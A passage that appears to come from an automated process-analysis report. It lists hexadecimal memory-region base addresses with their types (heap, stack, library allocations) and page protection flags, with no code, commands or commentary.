||
7EB0000
|
trusted library allocation
|
page read and write
|
||
6C18000
|
heap
|
page read and write
|
||
6284000
|
heap
|
page read and write
|
||
7B50000
|
trusted library allocation
|
page read and write
|
||
7149000
|
heap
|
page read and write
|
||
4AD4000
|
heap
|
page read and write
|
||
2815000
|
heap
|
page read and write
|
||
3460000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
heap
|
page read and write
|
||
527B000
|
trusted library allocation
|
page read and write
|
||
6B66000
|
heap
|
page read and write
|
||
6A74000
|
heap
|
page read and write
|
||
30CD000
|
stack
|
page read and write
|
||
72DD000
|
stack
|
page read and write
|
||
A03000
|
trusted library allocation
|
page execute and read and write
|
||
2728000
|
heap
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
78A0000
|
heap
|
page read and write
|
||
10DE000
|
stack
|
page read and write
|
||
3167000
|
heap
|
page read and write
|
||
8AFC000
|
trusted library allocation
|
page read and write
|
||
2EEE000
|
stack
|
page read and write
|
||
4AD2000
|
heap
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
80F1000
|
heap
|
page read and write
|
||
6B5D000
|
heap
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
7B80000
|
trusted library allocation
|
page read and write
|
||
6261000
|
heap
|
page read and write
|
||
6F7A000
|
heap
|
page read and write
|
||
810E000
|
stack
|
page read and write
|
||
4BA3000
|
heap
|
page read and write
|
||
33C9000
|
heap
|
page read and write
|
||
7126000
|
heap
|
page read and write
|
||
6B66000
|
heap
|
page read and write
|
||
6284000
|
heap
|
page read and write
|
||
728E000
|
trusted library allocation
|
page read and write
|
||
6C90000
|
heap
|
page execute and read and write
|
||
7230000
|
trusted library allocation
|
page execute and read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
309D000
|
stack
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
483C000
|
heap
|
page read and write
|
||
4B39000
|
trusted library allocation
|
page read and write
|
||
51E9000
|
trusted library allocation
|
page read and write
|
||
7F8E000
|
stack
|
page read and write
|
||
634E000
|
trusted library allocation
|
page read and write
|
||
7440000
|
trusted library allocation
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
6C1A000
|
heap
|
page read and write
|
||
778E000
|
stack
|
page read and write
|
||
71F3000
|
heap
|
page read and write
|
||
98F000
|
stack
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
6537000
|
trusted library allocation
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
5467000
|
heap
|
page read and write
|
||
2C10000
|
heap
|
page readonly
|
||
6F59000
|
heap
|
page read and write
|
||
6BEA000
|
stack
|
page read and write
|
||
54CD000
|
heap
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
4ED1000
|
trusted library allocation
|
page read and write
|
||
5421000
|
heap
|
page read and write
|
||
5281000
|
trusted library allocation
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
487F000
|
heap
|
page read and write
|
||
6B68000
|
heap
|
page read and write
|
||
724C000
|
stack
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
4BC2000
|
heap
|
page read and write
|
||
66CD000
|
stack
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
5BD6000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
heap
|
page read and write
|
||
9EA0000
|
heap
|
page read and write
|
||
3346000
|
heap
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
6F18000
|
heap
|
page read and write
|
||
7B0E000
|
stack
|
page read and write
|
||
6263000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
2D0F000
|
stack
|
page read and write
|
||
8B10000
|
trusted library allocation
|
page read and write
|
||
7EBD000
|
trusted library allocation
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
45AE000
|
stack
|
page read and write
|
||
812A000
|
heap
|
page read and write
|
||
6FDA000
|
heap
|
page read and write
|
||
4A90000
|
heap
|
page read and write
|
||
62B5000
|
heap
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
489D000
|
heap
|
page read and write
|
||
6F59000
|
heap
|
page read and write
|
||
3470000
|
trusted library allocation
|
page read and write
|
||
6670000
|
direct allocation
|
page read and write
|
||
7F4E000
|
stack
|
page read and write
|
||
4EC0000
|
heap
|
page execute and read and write
|
||
4AA4000
|
heap
|
page read and write
|
||
627F000
|
heap
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
2D5C000
|
heap
|
page read and write
|
||
51DF000
|
trusted library allocation
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
6FCE000
|
stack
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
482E000
|
heap
|
page read and write
|
||
5BD000
|
stack
|
page read and write
|
||
73FE000
|
stack
|
page read and write
|
||
4960000
|
heap
|
page read and write
|
||
8600000
|
trusted library allocation
|
page execute and read and write
|
||
6355000
|
trusted library allocation
|
page read and write
|
||
6EA7000
|
heap
|
page read and write
|
||
75CD000
|
stack
|
page read and write
|
||
6C2C000
|
stack
|
page read and write
|
||
72B9000
|
trusted library allocation
|
page read and write
|
||
4B98000
|
heap
|
page read and write
|
||
6DCF000
|
heap
|
page read and write
|
||
770E000
|
stack
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
80DD000
|
heap
|
page read and write
|
||
6337000
|
heap
|
page read and write
|
||
AA0000
|
trusted library allocation
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
525D000
|
trusted library allocation
|
page read and write
|
||
808E000
|
stack
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
6FB7000
|
heap
|
page read and write
|
||
4DC000
|
stack
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
27EB000
|
heap
|
page read and write
|
||
2ACE000
|
stack
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
2B80000
|
trusted library allocation
|
page read and write
|
||
738E000
|
stack
|
page read and write
|
||
AB0000
|
trusted library allocation
|
page read and write
|
||
6710000
|
direct allocation
|
page read and write
|
||
6D9B000
|
stack
|
page read and write
|
||
AB4000
|
trusted library allocation
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page execute and read and write
|
||
5215000
|
trusted library allocation
|
page read and write
|
||
5B99000
|
trusted library allocation
|
page read and write
|
||
AC9000
|
heap
|
page read and write
|
||
4B1B000
|
heap
|
page read and write
|
||
4D80000
|
heap
|
page execute and read and write
|
||
86F0000
|
heap
|
page read and write
|
||
70E0000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page execute and read and write
|
||
532B000
|
trusted library allocation
|
page read and write
|
||
32CE000
|
stack
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
490E000
|
stack
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
4DDE000
|
stack
|
page read and write
|
||
6337000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
3386000
|
heap
|
page read and write
|
||
6F7C000
|
heap
|
page read and write
|
||
71C0000
|
trusted library allocation
|
page read and write
|
||
653B000
|
trusted library allocation
|
page read and write
|
||
4B70000
|
trusted library allocation
|
page read and write
|
||
727E000
|
stack
|
page read and write
|
||
6264000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
66C2000
|
direct allocation
|
page read and write
|
||
6F59000
|
heap
|
page read and write
|
||
6263000
|
heap
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
33A000
|
stack
|
page read and write
|
||
281B000
|
heap
|
page read and write
|
||
332E000
|
stack
|
page read and write
|
||
4B18000
|
heap
|
page read and write
|
||
69B0000
|
trusted library allocation
|
page read and write
|
||
54E0000
|
trusted library allocation
|
page read and write
|
||
6E9F000
|
heap
|
page read and write
|
||
305C000
|
stack
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
4CC0000
|
heap
|
page read and write
|
||
53DB000
|
stack
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
5AF9000
|
trusted library allocation
|
page read and write
|
||
7880000
|
trusted library allocation
|
page read and write
|
||
54DB000
|
heap
|
page read and write
|
||
6F1A000
|
heap
|
page read and write
|
||
4855000
|
heap
|
page read and write
|
||
6F66000
|
heap
|
page read and write
|
||
315C000
|
heap
|
page read and write
|
||
2D29000
|
heap
|
page read and write
|
||
4B1B000
|
heap
|
page read and write
|
||
7360000
|
trusted library allocation
|
page read and write
|
||
27EA000
|
heap
|
page read and write
|
||
73BA000
|
stack
|
page read and write
|
||
6F83000
|
heap
|
page read and write
|
||
455E000
|
stack
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
7B4D000
|
stack
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
AB3000
|
trusted library allocation
|
page execute and read and write
|
||
7934000
|
heap
|
page read and write
|
||
66B2000
|
direct allocation
|
page read and write
|
||
6F49000
|
heap
|
page read and write
|
||
2C80000
|
trusted library allocation
|
page execute and read and write
|
||
6F26000
|
heap
|
page read and write
|
||
2705000
|
heap
|
page read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
heap
|
page read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
281A000
|
heap
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
2B50000
|
trusted library allocation
|
page read and write
|
||
873E000
|
stack
|
page read and write
|
||
74DD000
|
stack
|
page read and write
|
||
6341000
|
trusted library allocation
|
page read and write
|
||
A00000
|
trusted library allocation
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
4878000
|
heap
|
page read and write
|
||
6FD3000
|
heap
|
page read and write
|
||
653F000
|
trusted library allocation
|
page read and write
|
||
7750000
|
heap
|
page read and write
|
||
A42000
|
trusted library allocation
|
page read and write
|
||
6DD4000
|
heap
|
page read and write
|
||
6A21000
|
heap
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
6216000
|
trusted library allocation
|
page read and write
|
||
2CF7000
|
heap
|
page read and write
|
||
4C70000
|
trusted library allocation
|
page read and write
|
||
5026000
|
trusted library allocation
|
page read and write
|
||
7F4D000
|
stack
|
page read and write
|
||
451E000
|
stack
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
6F6B000
|
heap
|
page read and write
|
||
6FFE000
|
heap
|
page read and write
|
||
4DF5000
|
heap
|
page execute and read and write
|
||
7B3E000
|
direct allocation
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
7138000
|
heap
|
page read and write
|
||
2FB8000
|
heap
|
page read and write
|
||
71EE000
|
stack
|
page read and write
|
||
542A000
|
trusted library allocation
|
page read and write
|
||
6B70000
|
heap
|
page read and write
|
||
27EA000
|
heap
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page execute and read and write
|
||
4B0E000
|
stack
|
page read and write
|
||
768E000
|
stack
|
page read and write
|
||
7480000
|
trusted library allocation
|
page read and write
|
||
728A000
|
trusted library allocation
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
6F8E000
|
heap
|
page read and write
|
||
4AC0000
|
heap
|
page execute and read and write
|
||
4B95000
|
heap
|
page read and write
|
||
87FE000
|
stack
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
2FA2000
|
heap
|
page read and write
|
||
652F000
|
stack
|
page read and write
|
||
4627000
|
heap
|
page read and write
|
||
6E6F000
|
stack
|
page read and write
|
||
330E000
|
heap
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
4B95000
|
heap
|
page read and write
|
||
2F72000
|
heap
|
page read and write
|
||
4DF7000
|
trusted library allocation
|
page read and write
|
||
541A000
|
trusted library allocation
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
7B3E000
|
direct allocation
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
774E000
|
stack
|
page read and write
|
||
3480000
|
trusted library allocation
|
page read and write
|
||
7220000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
4BBE000
|
stack
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
6284000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
2DB6000
|
heap
|
page read and write
|
||
3054000
|
heap
|
page read and write
|
||
4C20000
|
trusted library allocation
|
page read and write
|
||
6F24000
|
heap
|
page read and write
|
||
87BE000
|
stack
|
page read and write
|
||
6F93000
|
heap
|
page read and write
|
||
6B0D000
|
stack
|
page read and write
|
||
4F30000
|
heap
|
page read and write
|
||
66F0000
|
direct allocation
|
page read and write
|
||
337D000
|
trusted library allocation
|
page execute and read and write
|
||
277F000
|
heap
|
page read and write
|
||
5C61000
|
trusted library allocation
|
page read and write
|
||
6EEE000
|
stack
|
page read and write
|
||
5ED1000
|
trusted library allocation
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
338B000
|
heap
|
page read and write
|
||
51C1000
|
trusted library allocation
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
6B68000
|
heap
|
page read and write
|
||
4560000
|
heap
|
page read and write
|
||
4B95000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
6F2C000
|
heap
|
page read and write
|
||
487F000
|
heap
|
page read and write
|
||
6337000
|
heap
|
page read and write
|
||
51FA000
|
trusted library allocation
|
page read and write
|
||
877E000
|
stack
|
page read and write
|
||
4ACD000
|
heap
|
page read and write
|
||
6F66000
|
heap
|
page read and write
|
||
73CD000
|
stack
|
page read and write
|
||
2D4C000
|
heap
|
page read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
2751000
|
heap
|
page read and write
|
||
4A7F000
|
stack
|
page read and write
|
||
7890000
|
heap
|
page execute and read and write
|
||
6F93000
|
heap
|
page read and write
|
||
78CD000
|
heap
|
page read and write
|
||
79F0000
|
trusted library section
|
page read and write
|
||
6F9F000
|
heap
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
71BC000
|
heap
|
page read and write
|
||
48A3000
|
heap
|
page read and write
|
||
6FC1000
|
heap
|
page read and write
|
||
4C00000
|
heap
|
page read and write
|
||
2F00000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
4B95000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
5B8000
|
stack
|
page read and write
|
||
5D13000
|
trusted library allocation
|
page read and write
|
||
539F000
|
stack
|
page read and write
|
||
788B000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
78FA000
|
heap
|
page read and write
|
||
334A000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
7200000
|
trusted library allocation
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
62B6000
|
heap
|
page read and write
|
||
6DCF000
|
heap
|
page read and write
|
||
31AB000
|
heap
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
6CD0000
|
heap
|
page read and write
|
||
6EA0000
|
heap
|
page read and write
|
||
2817000
|
heap
|
page read and write
|
||
714E000
|
heap
|
page read and write
|
||
4CC8000
|
trusted library allocation
|
page read and write
|
||
71D3000
|
heap
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
74BB000
|
stack
|
page read and write
|
||
7B70000
|
trusted library allocation
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
4CC0000
|
trusted library allocation
|
page execute and read and write
|
||
6CF0000
|
heap
|
page read and write
|
||
4842000
|
heap
|
page read and write
|
||
280B000
|
heap
|
page read and write
|
||
8FD000
|
stack
|
page read and write
|
||
6F93000
|
heap
|
page read and write
|
||
9FC000
|
stack
|
page read and write
|
||
7490000
|
trusted library allocation
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
6DCD000
|
heap
|
page read and write
|
||
6240000
|
heap
|
page read and write
|
||
48A6000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
2F91000
|
heap
|
page read and write
|
||
34A0000
|
trusted library allocation
|
page read and write
|
||
7E90000
|
heap
|
page read and write
|
||
518000
|
stack
|
page read and write
|
||
A38000
|
heap
|
page read and write
|
||
2802000
|
heap
|
page read and write
|
||
A68000
|
heap
|
page read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
73C0000
|
trusted library allocation
|
page read and write
|
||
6F49000
|
heap
|
page read and write
|
||
2FA3000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
7921000
|
heap
|
page read and write
|
||
2CCC000
|
heap
|
page read and write
|
||
48B0000
|
trusted library allocation
|
page read and write
|
||
4B52000
|
trusted library allocation
|
page read and write
|
||
5027000
|
trusted library allocation
|
page read and write
|
||
8252000
|
trusted library allocation
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
ABD000
|
trusted library allocation
|
page execute and read and write
|
||
6261000
|
heap
|
page read and write
|
||
2FD2000
|
heap
|
page read and write
|
||
6263000
|
heap
|
page read and write
|
||
2747000
|
heap
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
488B000
|
heap
|
page read and write
|
||
7350000
|
trusted library allocation
|
page read and write
|
||
4ACB000
|
stack
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
62BA000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
727E000
|
stack
|
page read and write
|
||
6337000
|
heap
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page read and write
|
||
6AC7000
|
heap
|
page read and write
|
||
6F1C000
|
heap
|
page read and write
|
||
68D0000
|
trusted library allocation
|
page read and write
|
||
2C28000
|
trusted library allocation
|
page read and write
|
||
71F5000
|
heap
|
page read and write
|
||
887E000
|
stack
|
page read and write
|
||
6F8E000
|
heap
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page read and write
|
||
280E000
|
heap
|
page read and write
|
||
7DA0000
|
heap
|
page read and write
|
||
6F86000
|
heap
|
page read and write
|
||
4A85000
|
heap
|
page read and write
|
||
7D60000
|
heap
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
49AD000
|
stack
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
7A8E000
|
stack
|
page read and write
|
||
6E9F000
|
heap
|
page read and write
|
||
6FAC000
|
heap
|
page read and write
|
||
4F3D000
|
stack
|
page read and write
|
||
4AAC000
|
heap
|
page read and write
|
||
4DFE000
|
stack
|
page read and write
|
||
7B10000
|
direct allocation
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
4A80000
|
heap
|
page execute and read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
6ED6000
|
heap
|
page read and write
|
||
6FA1000
|
heap
|
page read and write
|
||
6F52000
|
heap
|
page read and write
|
||
4C7C000
|
stack
|
page read and write
|
||
51A4000
|
heap
|
page read and write
|
||
7410000
|
trusted library allocation
|
page read and write
|
||
2802000
|
heap
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
4B80000
|
heap
|
page read and write
|
||
6343000
|
trusted library allocation
|
page read and write
|
||
48A5000
|
heap
|
page read and write
|
||
810D000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page execute and read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
5C79000
|
trusted library allocation
|
page read and write
|
||
624F000
|
heap
|
page read and write
|
||
4AA0000
|
heap
|
page read and write
|
||
7ACE000
|
stack
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
4F60000
|
heap
|
page read and write
|
||
4B55000
|
trusted library allocation
|
page execute and read and write
|
||
6F85000
|
heap
|
page read and write
|
||
721E000
|
stack
|
page read and write
|
||
8310000
|
trusted library allocation
|
page read and write
|
||
4A84000
|
heap
|
page read and write
|
||
6830000
|
trusted library allocation
|
page read and write
|
||
30D9000
|
heap
|
page read and write
|
||
792C000
|
stack
|
page read and write
|
||
2FD2000
|
heap
|
page read and write
|
||
66D0000
|
direct allocation
|
page read and write
|
||
6E97000
|
heap
|
page read and write
|
||
747D000
|
stack
|
page read and write
|
||
7ED0000
|
heap
|
page read and write
|
||
714C000
|
heap
|
page read and write
|
||
6E77000
|
heap
|
page read and write
|
||
6B4B000
|
stack
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
495E000
|
stack
|
page read and write
|
||
6F24000
|
heap
|
page read and write
|
||
7FE0000
|
trusted library allocation
|
page read and write
|
||
2FE1000
|
heap
|
page read and write
|
||
E9E000
|
stack
|
page read and write
|
||
6E48000
|
heap
|
page read and write
|
||
2E9D000
|
stack
|
page read and write
|
||
AB0000
|
heap
|
page readonly
|
||
27FF000
|
heap
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
6F5B000
|
heap
|
page read and write
|
||
61B1000
|
trusted library allocation
|
page read and write
|
||
4E0D000
|
trusted library allocation
|
page read and write
|
||
2807000
|
heap
|
page read and write
|
||
782B000
|
stack
|
page read and write
|
||
6DD7000
|
heap
|
page read and write
|
||
2741000
|
heap
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
7680000
|
heap
|
page read and write
|
||
2802000
|
heap
|
page read and write
|
||
8AF0000
|
trusted library allocation
|
page read and write
|
||
722E000
|
stack
|
page read and write
|
||
61D9000
|
trusted library allocation
|
page read and write
|
||
4E36000
|
heap
|
page read and write
|
||
13C000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
7BAE000
|
stack
|
page read and write
|
||
44E000
|
stack
|
page read and write
|
||
2F7E000
|
heap
|
page read and write
|
||
4D20000
|
heap
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
552C000
|
trusted library allocation
|
page read and write
|
||
8270000
|
trusted library allocation
|
page execute and read and write
|
||
2B49000
|
trusted library allocation
|
page read and write
|
||
86BD000
|
stack
|
page read and write
|
||
629B000
|
heap
|
page read and write
|
||
6C95000
|
heap
|
page execute and read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
4B83000
|
heap
|
page read and write
|
||
6C20000
|
trusted library allocation
|
page read and write
|
||
62D7000
|
heap
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
770E000
|
stack
|
page read and write
|
||
4E0D000
|
stack
|
page read and write
|
||
27F7000
|
heap
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page read and write
|
||
2F40000
|
trusted library allocation
|
page read and write
|
||
6D5E000
|
stack
|
page read and write
|
||
7925000
|
heap
|
page read and write
|
||
7190000
|
heap
|
page execute and read and write
|
||
51E7000
|
trusted library allocation
|
page read and write
|
||
5280000
|
trusted library allocation
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
314E000
|
stack
|
page read and write
|
||
7916000
|
heap
|
page read and write
|
||
2F05000
|
heap
|
page read and write
|
||
624F000
|
heap
|
page read and write
|
||
80B3000
|
heap
|
page read and write
|
||
6F9D000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
74A0000
|
trusted library allocation
|
page read and write
|
||
6F9E000
|
heap
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
4B30000
|
trusted library allocation
|
page read and write
|
||
AC7000
|
heap
|
page read and write
|
||
77D7000
|
heap
|
page read and write
|
||
7EA0000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
6B71000
|
heap
|
page read and write
|
||
793D000
|
heap
|
page read and write
|
||
7EEE0000
|
trusted library allocation
|
page execute and read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
4DFB000
|
trusted library allocation
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
6F62000
|
heap
|
page read and write
|
||
625B000
|
heap
|
page read and write
|
||
6F83000
|
heap
|
page read and write
|
||
4AA9000
|
heap
|
page read and write
|
||
6DC5000
|
heap
|
page read and write
|
||
4B98000
|
heap
|
page read and write
|
||
2CBC000
|
heap
|
page read and write
|
||
6FA3000
|
heap
|
page read and write
|
||
6253000
|
heap
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
8470000
|
trusted library allocation
|
page read and write
|
||
5401000
|
heap
|
page read and write
|
||
7209000
|
heap
|
page read and write
|
||
341F000
|
stack
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
67F2000
|
heap
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
743E000
|
stack
|
page read and write
|
||
2B5A000
|
trusted library allocation
|
page execute and read and write
|
||
3489000
|
trusted library allocation
|
page read and write
|
||
716D000
|
heap
|
page read and write
|
||
6C80000
|
trusted library allocation
|
page read and write
|
||
FDE000
|
stack
|
page read and write
|
||
625B000
|
heap
|
page read and write
|
||
6F9A000
|
heap
|
page read and write
|
||
7EC0000
|
heap
|
page read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
733D000
|
stack
|
page read and write
|
||
6FCD000
|
heap
|
page read and write
|
||
4D30000
|
heap
|
page execute and read and write
|
||
62D9000
|
heap
|
page read and write
|
||
7021000
|
heap
|
page read and write
|
||
6B66000
|
heap
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
4FA3000
|
heap
|
page read and write
|
||
4AB4000
|
heap
|
page read and write
|
||
331F000
|
heap
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
6FD0000
|
heap
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
6F5C000
|
heap
|
page read and write
|
||
6351000
|
trusted library allocation
|
page read and write
|
||
27DF000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
27F6000
|
heap
|
page read and write
|
||
6E9F000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
6DCF000
|
heap
|
page read and write
|
||
2F68000
|
heap
|
page read and write
|
||
488F000
|
heap
|
page read and write
|
||
7169000
|
heap
|
page read and write
|
||
4DE9000
|
trusted library allocation
|
page read and write
|
||
4A80000
|
heap
|
page read and write
|
||
67F0000
|
trusted library allocation
|
page execute
|
||
7E00000
|
trusted library allocation
|
page execute and read and write
|
||
2DF1000
|
heap
|
page read and write
|
||
2B40000
|
trusted library allocation
|
page read and write
|
||
34A2000
|
trusted library allocation
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
5279000
|
trusted library allocation
|
page read and write
|
||
731B000
|
stack
|
page read and write
|
||
2FFA000
|
heap
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
5321000
|
trusted library allocation
|
page read and write
|
||
6F2B000
|
heap
|
page read and write
|
||
2748000
|
heap
|
page read and write
|
||
654B000
|
trusted library allocation
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
6EA4000
|
heap
|
page read and write
|
||
7520000
|
heap
|
page read and write
|
||
62B4000
|
heap
|
page read and write
|
||
2D8D000
|
heap
|
page read and write
|
||
72FE000
|
stack
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
2FB1000
|
heap
|
page read and write
|
||
71CA000
|
heap
|
page read and write
|
||
7115000
|
heap
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
629A000
|
heap
|
page read and write
|
||
6B5E000
|
heap
|
page read and write
|
||
4D6E000
|
stack
|
page read and write
|
||
6FC2000
|
heap
|
page read and write
|
||
54EB000
|
heap
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page execute and read and write
|
||
5B71000
|
trusted library allocation
|
page read and write
|
||
4AD8000
|
heap
|
page read and write
|
||
72AE000
|
trusted library allocation
|
page read and write
|
||
2772000
|
heap
|
page read and write
|
||
3196000
|
heap
|
page read and write
|
||
6F66000
|
heap
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
4E8B000
|
stack
|
page read and write
|
||
7D20000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
700D000
|
heap
|
page read and write
|
||
305C000
|
heap
|
page read and write
|
||
8050000
|
heap
|
page read and write
|
||
6B6E000
|
heap
|
page read and write
|
||
4FB5000
|
trusted library allocation
|
page read and write
|
||
6E18000
|
heap
|
page read and write
|
||
6F8E000
|
heap
|
page read and write
|
||
8E8C000
|
stack
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
2BE5000
|
stack
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
4D10000
|
heap
|
page readonly
|
||
7390000
|
trusted library allocation
|
page execute and read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
6EAE000
|
stack
|
page read and write
|
||
4C3F000
|
stack
|
page read and write
|
||
754D000
|
stack
|
page read and write
|
||
6FBC000
|
heap
|
page read and write
|
||
